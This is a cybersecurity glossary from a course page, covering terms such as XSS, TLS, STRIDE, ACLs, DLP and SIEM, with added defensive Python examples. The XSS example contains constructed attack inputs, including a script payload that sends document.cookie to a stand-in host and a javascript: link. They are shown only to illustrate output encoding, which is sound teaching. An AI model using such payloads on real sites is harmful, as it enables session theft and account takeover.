Cybersecurity and Data Protection

Expert-defined terms from the Postgraduate Certificate in Cyberpsychology course at LearnUNI. Free to read, free to share, paired with a professional course.

Attack Vector

An attack vector is the path or method used by a threat actor to gain unauthoriz…

Common vectors include phishing emails, compromised web applications, and vulnerable IoT devices. In practice, security teams map attack vectors during risk assessments to prioritize remediation. For example, a ransomware campaign may exploit an unpatched Windows SMB service as its vector. Challenges arise when new vectors appear faster than patch cycles, requiring continuous monitoring and adaptive defenses.

Authentication

Authentication verifies that a user or device is who it claims to be, typically…

Strong authentication reduces the likelihood of unauthorized access. A practical application is the use of MFA for remote employee logins to corporate VPNs. However, usability concerns, such as token loss or biometric error rates, can hinder adoption, and attackers may still employ credential‑stuffing attacks against weak passwords.

Authorization

Authorization determines what authenticated entities are allowed to do within a…

It enforces policies that restrict actions based on roles, groups, or attributes. For instance, an HR employee may have read‑only access to employee records, while a manager has edit rights. The main challenge is maintaining least‑privilege over time as users change roles, which often leads to permission creep if not regularly reviewed.

Advanced Persistent Threat (APT)

An APT is a sophisticated, long‑term intrusion typically sponsored by a nation‑s…

Attackers aim to remain undetected for months while exfiltrating valuable data or, in some campaigns, sabotaging systems. An example is the “Stuxnet” worm, attributed to nation‑state actors, which targeted industrial control systems to damage equipment rather than to steal data. Mitigating APTs requires layered defenses, continuous threat hunting, and rapid incident response, yet the covert nature of these campaigns makes detection extremely difficult.

Botnet

A botnet is a network of compromised devices controlled remotely to perform coor…

Botnets often exploit IoT devices with default credentials. A real‑world case is the Mirai botnet that generated massive DDoS traffic in 2016. Challenges include the sheer scale of infected endpoints and the need for coordinated takedown efforts across jurisdictions.

Brute‑Force Attack

In a brute‑force attack, an attacker systematically tries many possible password…

Simple dictionary attacks on weak passwords are common. Organizations mitigate this risk with account lockout policies, rate limiting, and MFA. However, attackers sidestep per‑account lockout by password spraying (one common password tried against many accounts) and sidestep per‑IP rate limits by distributing attempts across a botnet, so anomaly detection that correlates failures across accounts and source addresses is essential, though it can be resource‑intensive.

Breach Notification

Cipher

A cipher is a mathematical algorithm that transforms plaintext into ciphertext u…

Modern ciphers like AES (Advanced Encryption Standard) provide strong confidentiality. For example, an organization encrypts backup files with AES‑256 before storing them in the cloud. The main challenges are key management, ensuring proper implementation, and guarding against side‑channel attacks that may leak information despite strong ciphers.

Confidentiality

Confidentiality ensures that sensitive information is accessible only to authori…

Encryption, access controls, and data masking are typical controls. A practical application is encrypting patient health records in electronic health systems. The difficulty lies in balancing confidentiality with usability; overly restrictive controls can impede legitimate workflows, leading users to seek insecure workarounds.

Cross‑Site Scripting (XSS)

XSS is a client‑side code injection attack where malicious scripts are injected…

An attacker may embed JavaScript in a comment field, causing the script to execute in the browsers of other users who view it. The primary defense is context‑aware output encoding of untrusted data (HTML body, attribute, URL and JavaScript contexts each need different escaping), backed by a Content Security Policy header that limits which scripts may run; input validation helps but is not sufficient on its own. The challenge is that many legacy applications build HTML by string concatenation, so the flaw recurs in each new template even after individual instances are patched.
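
To make the encoding point concrete, the following added Python example (not code from the course or from any application it describes) renders the comment from the paragraph above twice: once by string concatenation, as a vulnerable legacy template would, and once with context‑aware encoding plus a URL allow‑list. The attacker inputs and the CSP_HEADER value are constructed for the example.

```python
import html
from urllib.parse import urlsplit

# Constructed attacker-controlled inputs, as submitted through a comment form
ATTACKER_NAME = '" onmouseover="alert(1)'
ATTACKER_URL = "javascript:alert(document.domain)"
ATTACKER_BODY = '<script>new Image().src="https://evil.example/?c="+document.cookie</script>'

# A response header that limits the damage if an encoding bug slips through (constructed policy)
CSP_HEADER = "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'"


def render_comment_unsafe(name: str, url: str, body: str) -> str:
    """Vulnerable: untrusted values concatenated straight into HTML."""
    return f'<a href="{url}" title="{name}">{name}</a><p>{body}</p>'


def safe_href(url: str) -> str:
    """Allow http(s) and site-relative links only; javascript:/data: URLs become a harmless '#'.
    Encoding alone cannot fix the URL context, so this is an allow-list, not an escape."""
    url = url.strip()
    scheme = urlsplit(url).scheme.lower()
    if scheme in ("http", "https"):
        return url
    if scheme == "" and url.startswith("/") and not url.startswith("//"):
        return url
    return "#"


def render_comment_safe(name: str, url: str, body: str) -> str:
    """Each value is encoded for the context it lands in: attribute (quote=True), URL, then text."""
    name_attr = html.escape(name, quote=True)
    href = html.escape(safe_href(url), quote=True)
    return f'<a href="{href}" title="{name_attr}">{name_attr}</a><p>{html.escape(body)}</p>'
```

The unsafe render emits the script tag and the `javascript:` link verbatim; the safe render turns the body into inert text, neutralises the quote-breaking display name inside the attribute, and replaces the link with `#`, since no amount of escaping makes a `javascript:` URL safe in an href.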

Data Encryption

Data encryption transforms readable data into ciphertext to protect it from unau…

Encryption can be applied to data at rest (e.g., encrypted databases) and in transit (e.g., TLS for web traffic). A practical use case is encrypting mobile device storage to prevent data exposure if the device is lost. Challenges revolve around secure key storage, performance overhead, and ensuring that encryption does not impede legitimate analytics.

Digital Forensics

Digital forensics involves collecting, preserving, and analyzing electronic evid…

Techniques include memory imaging, log analysis, and file system reconstruction. For example, after a ransomware incident, forensic investigators may recover encryption keys from memory dumps. The main challenges are maintaining evidence integrity, dealing with encrypted data, and staying current with rapidly evolving malware techniques.
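
An added example, not part of the course material, of how evidence integrity can be maintained in code: a hash‑chained chain‑of‑custody log in Python, where each entry commits to the SHA‑256 of the evidence it concerns and to the hash of the previous entry, so any later edit or deletion is detectable. The memory image, analyst names and timestamps are constructed.

```python
import hashlib
import json


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


class CustodyLog:
    """Append-only chain-of-custody log.

    Every entry records the hash of the evidence it concerns and the hash of the
    previous entry, so altering or deleting any earlier record invalidates the chain.
    """
    GENESIS = "0" * 64

    def __init__(self):
        self.entries = []

    @staticmethod
    def _entry_hash(body: dict) -> str:
        # canonical JSON: stable key order, no whitespace, so the hash is reproducible
        return sha256_hex(json.dumps(body, sort_keys=True, separators=(",", ":")).encode())

    def record(self, evidence_id: str, action: str, handler: str, evidence: bytes, timestamp: str) -> str:
        prev = self.entries[-1]["entry_hash"] if self.entries else self.GENESIS
        body = {"seq": len(self.entries), "timestamp": timestamp, "evidence_id": evidence_id,
                "action": action, "handler": handler,
                "evidence_sha256": sha256_hex(evidence), "prev_hash": prev}
        entry = dict(body, entry_hash=self._entry_hash(body))
        self.entries.append(entry)
        return entry["entry_hash"]

    def verify(self, evidence_store: dict):
        """Return (True, None) if the chain and the evidence are intact, else (False, first bad seq)."""
        prev = self.GENESIS
        for e in self.entries:
            body = {k: v for k, v in e.items() if k != "entry_hash"}
            if e["prev_hash"] != prev or self._entry_hash(body) != e["entry_hash"]:
                return False, e["seq"]
            current = evidence_store.get(e["evidence_id"])
            if current is not None and sha256_hex(current) != e["evidence_sha256"]:
                return False, e["seq"]
            prev = e["entry_hash"]
        return True, None


def build_demo_log():
    """Constructed scenario: a memory image acquired, handed over, then analysed."""
    mem_image = b"\x00MEMDUMP-constructed-bytes-" + bytes(range(64))
    store = {"MEM-001": mem_image}
    log = CustodyLog()
    log.record("MEM-001", "acquired", "analyst-a", mem_image, "2026-03-14T10:02:00Z")
    log.record("MEM-001", "transferred", "analyst-b", mem_image, "2026-03-14T11:30:00Z")
    log.record("MEM-001", "analysed", "analyst-b", mem_image, "2026-03-14T14:05:00Z")
    return log, store
```

In practice the log head hash would be written somewhere the analyst cannot alter (a signed ticket, a WORM store); the chain then proves that nothing between that head and the first entry was changed.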

DNS Spoofing

DNS spoofing manipulates DNS responses to redirect users to malicious sites

An attacker may poison a resolver’s cache, causing victims to connect to a fake login page. Countermeasures include DNSSEC, which lets a validating resolver reject forged records, and encrypted DNS (DoH/DoT), which protects the client‑to‑resolver path from on‑path tampering but does not by itself validate what the resolver returns. However, not all resolvers validate DNSSEC, and encrypted DNS can add latency, making deployment a trade‑off.

Endpoint Security

Endpoint security protects devices such as laptops, smartphones, and servers fro…

Solutions often combine antivirus, application control, and device encryption. A typical scenario is deploying an endpoint detection and response (EDR) platform across a corporate fleet to detect abnormal processes. Challenges include managing diverse operating systems, preventing false positives, and ensuring that security agents do not degrade device performance.

Encryption Key

An encryption key is a secret value used by a cipher to encrypt or decrypt data

Proper key lifecycle management (generation, distribution, rotation, revocation) is critical. For instance, cloud providers offer a key management service (KMS) that rotates the keys protecting encrypted storage buckets automatically. The difficulty lies in protecting keys from insider threats and preventing loss, which would render encrypted data unrecoverable.

Ethical Hacking

Ethical hacking involves authorized attempts to discover security weaknesses, he…

Certified professionals (e.g., CEH, OSCP) perform controlled attacks to simulate real‑world threats. A practical application is a quarterly penetration test of a web application. Challenges include scope creep, ensuring that testing does not disrupt production services, and translating findings into actionable remediation.

Firewall

A firewall controls inbound and outbound network traffic based on predefined sec…

Traditional firewalls filter packets by IP and port, while NGFWs add application awareness and intrusion prevention. For example, an enterprise may block all inbound traffic except HTTPS to public servers. Limitations arise when encrypted traffic bypasses inspection, requiring decryption capabilities that can raise privacy concerns.

Phishing

Phishing is a deceptive technique where attackers impersonate trusted entities t…

Spear‑phishing targets specific individuals with tailored content. Organizations deploy email filters and user training to mitigate risk. Nevertheless, attackers continuously refine their lures, so no filter blocks every message; phishing‑resistant MFA and prompt credential resets limit the damage when a user is taken in.

Public Key Infrastructure (PKI)

PKI is a framework for creating, managing, and revoking digital certificates tha…

It enables secure communications, code signing, and device authentication. A common use is TLS certificates for web servers. Challenges include protecting private keys, handling certificate expiration, and managing trust across multiple CAs in large federated environments.

Ransomware

Ransomware encrypts victim data and demands payment for the decryption key

Variants like “WannaCry” exploit unpatched SMB vulnerabilities. Effective mitigation includes regular backups, network segmentation, and patch management. The difficulty lies in the rapid evolution of ransomware payloads and the temptation for victims to pay, which can encourage further attacks.

Risk Assessment

Risk assessment evaluates the likelihood and impact of potential security events…

Methods include qualitative scoring and quantitative calculations (e.g., Annualized Loss Expectancy). A practical example is assessing the risk of a data breach in a SaaS product. Challenges include obtaining accurate asset inventories, quantifying intangible impacts, and keeping assessments current as the threat landscape evolves.

Secure Sockets Layer / Transport Layer Security (SSL/TLS)

SSL/TLS provides encrypted communication between clients and servers, protecting…

During the handshake, the server presents a certificate, and both parties negotiate a protocol version and cipher suite. For instance, browsers use TLS 1.3 to secure e‑commerce transactions. All SSL versions and TLS 1.0/1.1 are deprecated; implementation pitfalls such as still enabling them, accepting weak ciphers, or skipping certificate validation can expose traffic to downgrade and interception attacks, requiring diligent configuration management.
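
As an added illustration (not from the course), the Python ssl module configured both ways: the permissive client that skips validation, and a hardened client that enforces TLS 1.2 or later, certificate and hostname checks, and forward‑secret AEAD suites. The cipher string and the audit checks are this example’s choices, not a recommendation taken from the page.

```python
import ssl


def permissive_client_context() -> ssl.SSLContext:
    """The usual pitfall: a client that 'just works' against any server because it verifies
    nothing. Any on-path attacker can present a self-signed certificate and read the traffic."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False           # must be cleared before verify_mode can be CERT_NONE
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def hardened_client_context(cafile: str = None) -> ssl.SSLContext:
    """Certificate and hostname verification on, no legacy protocol versions, AEAD suites with
    forward secrecy only (TLS 1.3 suites are managed separately by OpenSSL and stay enabled)."""
    ctx = ssl.create_default_context(cafile=cafile)   # CERT_REQUIRED, check_hostname=True, trust store loaded
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2      # SSLv3, TLS 1.0 and 1.1 are refused outright
    ctx.options |= ssl.OP_NO_COMPRESSION              # TLS compression enables CRIME-style attacks
    ctx.set_ciphers("ECDHE+AESGCM:ECDHE+CHACHA20")    # example cipher policy, not a vendor default
    return ctx


def audit(ctx: ssl.SSLContext) -> dict:
    """Summarise the facts a configuration review checks."""
    names = [c["name"] for c in ctx.get_ciphers()]
    return {
        "verifies_peer": ctx.verify_mode == ssl.CERT_REQUIRED,
        "checks_hostname": ctx.check_hostname,
        "min_version": ctx.minimum_version.name,
        # TLS 1.3 suites are named TLS_*; everything else must be ECDHE/DHE for forward secrecy
        "forward_secrecy_only": all(n.startswith("TLS_") or "DHE" in n for n in names),
        "non_aead": [n for n in names if not any(t in n for t in ("GCM", "CHACHA20", "CCM"))],
    }
```

The same three questions (is the peer verified, which versions are accepted, which suites are offered) are what a scanner asks of a server; running them against your own client contexts catches the `verify_mode = CERT_NONE` shortcut that so often survives from a developer’s local testing into production.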

Social Engineering

Social engineering exploits human psychology to gain unauthorized access, often…

An attacker may call a help‑desk employee, posing as a senior manager to reset a password. Training programs that simulate phishing attacks help raise awareness. However, cultural factors and fatigue can reduce effectiveness, making continuous reinforcement essential.

Supply Chain Attack

A supply chain attack compromises a trusted vendor to infiltrate downstream cust…

The SolarWinds incident is a notable example where malicious code was inserted into an update package. Mitigation strategies include code signing, SBOM verification, and strict vendor vetting. The challenge is that many organizations lack visibility into the security posture of their numerous suppliers.

Threat Modeling

Threat modeling systematically identifies potential threats, attacks, and mitiga…

Frameworks such as STRIDE (Spoofing, Tampering, Repudiation, Information Disclosure, Denial‑of‑Service, Elevation of Privilege) guide analysts. In practice, developers may create data flow diagrams to pinpoint insecure interfaces. The difficulty is allocating sufficient time during agile development cycles and ensuring that the model stays aligned with evolving architecture.
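
An added worked example, not from the course, of STRIDE applied per element to a small data flow diagram in Python. The STRIDE‑per‑element mapping is the standard one; the element and flow names, trust zones, and the mitigation rules (encryption covers Tampering and Information Disclosure on a flow, authentication covers Spoofing at the destination) are this example’s simplifications.

```python
from dataclasses import dataclass

# STRIDE-per-element: the threat categories each kind of DFD element is subject to
STRIDE_PER_ELEMENT = {
    "external": "SR",        # external entity
    "process": "STRIDE",
    "datastore": "TRID",
    "dataflow": "TID",
}
THREAT = {"S": "Spoofing", "T": "Tampering", "R": "Repudiation", "I": "Information Disclosure",
          "D": "Denial of Service", "E": "Elevation of Privilege"}


@dataclass
class Element:
    name: str
    kind: str    # external | process | datastore
    zone: str    # trust zone; a flow between different zones crosses a trust boundary


@dataclass
class Flow:
    name: str
    src: str
    dst: str
    encrypted: bool      # e.g. TLS on the wire
    authenticated: bool  # the destination verifies who is calling


def stride_for(kind: str):
    """Full STRIDE checklist for one element kind."""
    return [THREAT[c] for c in STRIDE_PER_ELEMENT[kind]]


def high_findings(elements, flows):
    """Unmitigated threats on flows that cross a trust boundary, the first things to fix.
    Encryption mitigates Tampering and Information Disclosure on the wire; authentication
    mitigates Spoofing of the caller at the destination; DoS on an exposed flow stays open."""
    zone = {e.name: e.zone for e in elements}
    findings = []
    for f in flows:
        if zone[f.src] == zone[f.dst]:
            continue
        for c in STRIDE_PER_ELEMENT["dataflow"]:
            if c in "TI" and f.encrypted:
                continue
            findings.append((f.name, THREAT[c]))
        if not f.authenticated:
            findings.append((f.dst, THREAT["S"]))
    return findings


# Constructed model: browser -> web app (TLS, pre-auth endpoint) -> database (plain TCP)
ELEMENTS = [Element("browser", "external", "internet"),
            Element("webapp", "process", "dmz"),
            Element("userdb", "datastore", "internal")]
FLOWS = [Flow("login-request", "browser", "webapp", encrypted=True, authenticated=False),
         Flow("user-lookup", "webapp", "userdb", encrypted=False, authenticated=True)]
```

Run on the constructed model, the plaintext hop from the DMZ into the internal zone produces the bulk of the high findings, which is exactly the “insecure interface” a data flow diagram is meant to surface before the sprint that builds it.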

Two‑Factor Authentication (2FA)

2FA adds a second verification step, typically something the user has (a token or mobile app) in addition to something they know (a password). An example is a corporate VPN that requires a password plus a time‑based OTP generated by an authenticator app. While 2FA significantly reduces credential‑stuffing success, OTP codes can be relayed in real time by adversary‑in‑the‑middle phishing (a reverse proxy placed between the victim and the real site); only factors cryptographically bound to the originating site, such as FIDO2/WebAuthn security keys and passkeys, resist this.

Zero‑Day Exploit

A zero‑day exploit leverages a previously unknown vulnerability for which no pat…

Attackers sell such exploits on underground markets, and defenders must rely on behavioral detection while no patch exists. The “EternalBlue” exploit, developed against a then‑unknown SMBv1 flaw and later used by WannaCry, illustrates the stakes: Microsoft had shipped the fix (MS17‑010) about two months before WannaCry spread, yet unpatched systems were still compromised at scale. Mitigation focuses on network segmentation, intrusion detection, and rapid patch deployment once the vulnerability becomes known, but the initial window of exposure remains a critical risk.

Zero‑Trust Architecture

Zero‑trust assumes no implicit trust for any user or device, regardless of locat…

Access is granted based on contextual policies, and every request is verified. A common implementation is a software‑defined perimeter that authenticates users before allowing access to internal applications. Challenges include the complexity of policy definition, integration with legacy systems, and potential performance impacts due to continuous verification.

Access Control List (ACL)

An ACL is a set of rules that define which users or system processes are granted…

For instance, a router ACL may block traffic from known malicious IP ranges. Managing ACLs at scale can become error‑prone, leading to overly permissive rules that increase attack surface.
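
To show where “error‑prone at scale” bites, the following added Python example (not from the course, and not any vendor’s ACL syntax) evaluates a router/firewall‑style ACL with first‑match and implicit‑deny semantics, then audits it for shadowed rules and overly permissive permits. It serves both the Firewall and ACL entries; the rule set and addresses are constructed from documentation ranges.

```python
import ipaddress

# Constructed ACL in evaluation order. First match wins; no match means drop (implicit deny).
RULES = [
    {"id": 10, "action": "deny",   "src": "203.0.113.0/24",  "dst": "0.0.0.0/0",     "port": "any"},
    {"id": 20, "action": "permit", "src": "0.0.0.0/0",       "dst": "192.0.2.10/32", "port": 443},
    {"id": 30, "action": "permit", "src": "198.51.100.0/24", "dst": "192.0.2.10/32", "port": 443},
    {"id": 40, "action": "permit", "src": "0.0.0.0/0",       "dst": "192.0.2.0/24",  "port": "any"},
]


def _covers(rule, src, dst, port):
    return (ipaddress.ip_address(src) in ipaddress.ip_network(rule["src"])
            and ipaddress.ip_address(dst) in ipaddress.ip_network(rule["dst"])
            and rule["port"] in ("any", port))


def evaluate(rules, src, dst, port):
    """Return (action, matching rule id); ('deny', None) when nothing matched."""
    for rule in rules:
        if _covers(rule, src, dst, port):
            return rule["action"], rule["id"]
    return "deny", None


def shadowed(rules):
    """Pairs (later_id, earlier_id) where the earlier rule matches everything the later one could,
    so the later rule never fires. These are the dead rules that accumulate in large ACLs."""
    found = []
    for i, later in enumerate(rules):
        l_src, l_dst = ipaddress.ip_network(later["src"]), ipaddress.ip_network(later["dst"])
        for earlier in rules[:i]:
            e_src, e_dst = ipaddress.ip_network(earlier["src"]), ipaddress.ip_network(earlier["dst"])
            if (l_src.subnet_of(e_src) and l_dst.subnet_of(e_dst)
                    and earlier["port"] in ("any", later["port"])):
                found.append((later["id"], earlier["id"]))
                break
    return found


def overly_permissive(rules):
    """Permit rules that accept any source on any port: the ones that quietly widen the attack surface."""
    return [r["id"] for r in rules
            if r["action"] == "permit" and ipaddress.ip_network(r["src"]).prefixlen == 0
            and r["port"] == "any"]
```

Rule 30 looks like a deliberate allowance for a partner network, but rule 20 already admits the whole Internet to the same host and port, so 30 never matches; rule 40 is the kind of “temporary” catch‑all that turns a segmented subnet back into a flat one.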

Biometric Authentication

Biometric authentication uses unique physiological traits to verify identity

Modern smartphones employ fingerprint or facial scanners for unlocking devices and authorizing payments. While convenient, biometric data is immutable—if compromised it cannot be changed like a password. Implementations must incorporate liveness detection to thwart spoofing attacks, and privacy regulations require explicit user consent for storage of biometric templates.

Certificate Pinning

Certificate pinning hard‑codes the expected server certificate or public key in…

Mobile apps often pin the API server’s certificate to mitigate MitM attacks on public Wi‑Fi. However, pinning can cause service disruption if the certificate is legitimately rotated, demanding robust update mechanisms.

Data Loss Prevention (DLP)

DLP solutions monitor and protect data at rest, in motion, and in use, preventin…

Policies may block copying of credit‑card numbers to external USB drives. In practice, organizations deploy DLP gateways on email and web traffic. The main challenge is balancing security with user productivity, as overly restrictive policies can lead to “shadow IT” where users bypass controls.
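
An added example, not from the course, of the detection logic behind the credit‑card policy above: a Python pattern match for 13–19 digit numbers filtered by the Luhn checksum, with redaction that keeps the last four digits. The sample message is constructed; 4111 1111 1111 1111 is a well‑known test PAN.

```python
import re

# 13-19 digits, optionally separated by single spaces or hyphens, not embedded in a longer digit run
CANDIDATE = re.compile(r"(?<![\d])(?:\d[ -]?){12,18}\d(?![\d])")


def luhn_ok(digits: str) -> bool:
    """Luhn checksum (ISO/IEC 7812): filters out most numbers that merely look like a PAN."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def _pan(match) -> str:
    """The normalised PAN for a regex match, or '' when it fails the length or Luhn check."""
    digits = re.sub(r"[ -]", "", match.group())
    return digits if 13 <= len(digits) <= 19 and luhn_ok(digits) else ""


def find_pans(text: str):
    return [p for p in (_pan(m) for m in CANDIDATE.finditer(text)) if p]


def redact(text: str) -> str:
    """Mask detected PANs but keep the last four digits, which support staff need for lookups."""
    return CANDIDATE.sub(lambda m: f"[PAN ****{_pan(m)[-4:]}]" if _pan(m) else m.group(), text)


# Constructed outbound message a DLP gateway would inspect
SAMPLE = ("Hi, charge card 4111 1111 1111 1111 (exp 12/27) for order 1234-5678-9012; "
          "the tracking ref 1234567890123456 is not a card.")
```

The Luhn filter is what keeps the false‑positive rate tolerable: the 16‑digit tracking reference in the sample is left alone, and the 12‑digit order number never reaches the checksum at all. Real deployments add issuer‑prefix (BIN) checks and context rules on top.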

Encryption at Rest

Encryption at rest protects stored data from unauthorized access, especially if…

Full‑disk encryption (e.g., BitLocker) encrypts the entire drive, while TDE encrypts database files. A practical scenario is encrypting backup tapes before off‑site storage. Difficulties include ensuring that encryption keys are not stored on the same device and managing performance overhead for high‑throughput workloads.

Exploit Kit

An exploit kit is a collection of pre‑written exploits targeting known software…

The “Angler” exploit kit chained multiple vulnerabilities to deliver ransomware payloads. Defenses involve keeping software patched, employing web‑gateway filtering, and disabling unnecessary browser plugins. Attackers constantly update kits, making signature‑based detection less effective.

Incident Response (IR)

IR is a structured approach to handling security incidents, from detection throu…

A typical IR plan includes phases: preparation, identification, containment, eradication, recovery, and lessons learned. For example, after a phishing breach, an organization may isolate affected endpoints, reset credentials, and conduct forensic analysis. The biggest hurdles are ensuring cross‑team coordination and maintaining up‑to‑date playbooks that reflect emerging threats.

Intrusion Detection System (IDS)

An IDS monitors network or host activity for suspicious patterns and alerts secu…

Signature‑based IDS relies on known attack signatures, while anomaly‑based IDS uses statistical models to detect deviations. Deploying a network IDS can reveal port scans or lateral movement attempts. However, high false‑positive rates can overwhelm analysts, and encrypted traffic reduces visibility unless decryption is performed.

Key Escrow

Key escrow involves storing encryption keys with a trusted third party so that a…

Some governments mandate escrow for communications providers. While escrow can aid lawful access, it introduces a single point of failure; if the escrow repository is compromised, all encrypted data becomes vulnerable.

Least Privilege

Least privilege is the principle that users and processes should receive only th…

Applying this reduces the impact of compromised accounts. For instance, a database service account should not have admin rights on the host OS. Implementing least privilege can be complex in large environments where many inter‑dependent services require fine‑grained permissions, leading to “permission creep” if not regularly audited.
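
An added Python example, not from the course, that pairs deny‑by‑default role‑based authorization (the Authorization entry) with the audit this entry calls for: roles none of whose permissions were exercised in a 90‑day access log are reported as permission‑creep candidates. Roles, users and log entries are constructed.

```python
from collections import defaultdict

# Constructed role catalogue and assignments
ROLES = {
    "hr_staff":   {"records:read"},
    "hr_manager": {"records:read", "records:write"},
    "dba":        {"db:query", "db:schema"},
    "host_admin": {"host:sudo"},
}
ASSIGNMENTS = {
    "alice": {"hr_staff"},
    "bob": {"hr_manager"},
    "svc-reports": {"dba", "host_admin"},   # picked up host_admin during a migration and never lost it
}


def permissions_of(user: str) -> set:
    """Unknown users and unknown roles contribute nothing: the check fails closed."""
    perms = set()
    for role in ASSIGNMENTS.get(user, ()):
        perms |= ROLES.get(role, set())
    return perms


def authorize(user: str, permission: str) -> bool:
    """Deny by default: only an explicitly granted permission passes."""
    return permission in permissions_of(user)


# Constructed 90-day access log of (user, permission actually exercised)
ACCESS_LOG = [
    ("alice", "records:read"), ("bob", "records:read"), ("bob", "records:write"),
    ("svc-reports", "db:query"), ("svc-reports", "db:query"),
]


def idle_roles(log=ACCESS_LOG) -> dict:
    """Roles none of whose permissions were used in the window: permission-creep candidates."""
    used = defaultdict(set)
    for user, perm in log:
        used[user].add(perm)
    report = {}
    for user, roles in ASSIGNMENTS.items():
        idle = {r for r in roles if not (ROLES.get(r, set()) & used[user])}
        if idle:
            report[user] = idle
    return report
```

The service account in the sample is the classic case: it needs database rights, it also holds host administration it has not used in the window, and that unused role is precisely what an attacker who compromises it would use.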

Man‑in‑the‑Middle (MitM)

A MitM attack intercepts communication between two parties, allowing the attacke…

An example is an attacker inserting a rogue Wi‑Fi access point and capturing unencrypted HTTP traffic. Countermeasures include TLS with certificate validation, HSTS, and VPNs. The challenge is that many users still access services over insecure protocols, providing ample opportunity for MitM exploitation.

Network Segmentation

Network segmentation divides a larger network into smaller, isolated zones to li…

A common practice is separating finance, HR, and guest networks using VLANs. In a breach, segmentation can contain the attacker to a single zone. However, misconfigured segmentation can create blind spots, and overly rigid boundaries may hinder legitimate inter‑departmental workflows.

Patch Management

Patch management is the process of acquiring, testing, and deploying software up…

Automated tools can schedule patch rollouts across thousands of endpoints. A real‑world scenario is applying the “PrintNightmare” patches to Windows print services. Challenges include balancing the urgency of critical patches against the risk of breaking production systems, and handling legacy devices that cannot be patched.

Pharming

Pharming redirects users from legitimate websites to fraudulent ones by compromi…

Victims may unknowingly submit credentials to a fake banking site. Defenses include DNSSEC, regular integrity checks of the local hosts file and resolver settings, and user education. The difficulty lies in detecting subtle DNS anomalies, especially when attackers use fast‑flux networks to rotate malicious IPs.

Public Wi‑Fi Security

Public Wi‑Fi networks are often unsecured, exposing users to eavesdropping and M…

Best practice recommends using a VPN to encrypt traffic and avoiding sensitive transactions on open networks. An example is a traveler connecting to a coffee shop’s Wi‑Fi and using a corporate VPN for email access. Limitations include VPN performance degradation and user reluctance to install additional software.

Ransomware Negotiation

Negotiation involves communicating with ransomware operators to obtain decryptio…

Some organizations employ third‑party negotiators specialized in cyber extortion. While negotiation can lead to data recovery without paying the full amount, it may also encourage further attacks and poses legal risks if payments violate sanctions. The ethical dilemma of paying versus maintaining data integrity remains a contentious issue.

Security Information and Event Management (SIEM)

A SIEM collects and analyzes logs from diverse sources, providing real‑time aler…

For example, a SIEM can correlate failed login attempts with a known malicious IP to trigger an incident response. Scalability and tuning are major challenges; excessive data can cause alert fatigue, while insufficient coverage may miss subtle attacks.
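
An added Python example (not from the course, and not any SIEM vendor’s rule language) that runs the correlation described here and under Brute‑Force Attack over constructed sshd‑style log lines: a burst rule, a password‑spray rule, a threat‑feed match and a success‑after‑failures rule. The addresses, usernames and the threat feed are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd-style authentication log (not from a real system)
LOG = """\
Mar 14 10:00:01 bastion sshd[2201]: Failed password for invalid user admin from 203.0.113.9 port 51122 ssh2
Mar 14 10:00:02 bastion sshd[2203]: Failed password for root from 203.0.113.9 port 51123 ssh2
Mar 14 10:00:03 bastion sshd[2205]: Failed password for root from 203.0.113.9 port 51124 ssh2
Mar 14 10:00:04 bastion sshd[2207]: Failed password for root from 203.0.113.9 port 51125 ssh2
Mar 14 10:00:05 bastion sshd[2209]: Failed password for root from 203.0.113.9 port 51126 ssh2
Mar 14 10:00:20 bastion sshd[2301]: Failed password for invalid user admin from 192.0.2.55 port 40001 ssh2
Mar 14 10:00:21 bastion sshd[2302]: Failed password for invalid user oracle from 192.0.2.55 port 40002 ssh2
Mar 14 10:00:22 bastion sshd[2303]: Failed password for invalid user test from 192.0.2.55 port 40003 ssh2
Mar 14 10:00:30 bastion sshd[2400]: Accepted password for alice from 10.0.0.4 port 50010 ssh2
Mar 14 10:01:10 bastion sshd[2501]: Failed password for svc-backup from 198.51.100.77 port 33001 ssh2
Mar 14 10:01:12 bastion sshd[2502]: Accepted password for svc-backup from 198.51.100.77 port 33002 ssh2
"""

# Constructed threat-intelligence list of known-bad sources
THREAT_FEED = {"198.51.100.77"}

LINE = re.compile(r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
                  r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+)")


def parse(log: str):
    events = []
    for line in log.splitlines():
        m = LINE.match(line)
        if m:   # lines the pattern does not cover are ignored, not mis-parsed
            ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")  # syslog has no year; only deltas matter here
            events.append((ts, m["result"], m["user"], m["ip"]))
    return sorted(events, key=lambda e: e[0])


def correlate(events, window=timedelta(seconds=60), burst=5, spray_users=3):
    """Sliding-window rules over failed logins, the way a SIEM correlation rule would run them."""
    alerts, seen = [], set()
    recent = defaultdict(list)   # ip -> [(ts, user)] failures inside the window

    def raise_alert(kind, ip, severity):
        if (kind, ip) not in seen:
            seen.add((kind, ip))
            alerts.append((kind, ip, severity))

    for ts, result, user, ip in events:
        recent[ip] = [(t, u) for t, u in recent[ip] if ts - t <= window]
        if result == "Failed":
            recent[ip].append((ts, user))
            if ip in THREAT_FEED:
                raise_alert("threat_feed_hit", ip, "high")
            if len(recent[ip]) >= burst:                        # many attempts, few accounts
                raise_alert("brute_force", ip, "medium")
            if len({u for _, u in recent[ip]}) >= spray_users:  # few attempts each, many accounts
                raise_alert("password_spray", ip, "medium")
        elif recent[ip]:                                        # success right after failures
            raise_alert("success_after_failures", ip, "critical")
    return alerts
```

The last rule is the one worth tuning first: a known‑bad source that fails once and then logs in is a far stronger signal than a hundred failures that never succeed, and it is the alert that should page someone rather than sit in a queue.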

Supply Chain Risk Management (SCRM)

SCRM identifies and mitigates risks associated with external suppliers and servi…

Practices include conducting security questionnaires, requiring contractual security clauses, and reviewing software component provenance via SBOMs. A notable case is the SolarWinds supply chain breach. The difficulty lies in achieving visibility across a sprawling ecosystem of subcontractors and ensuring consistent security standards.
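
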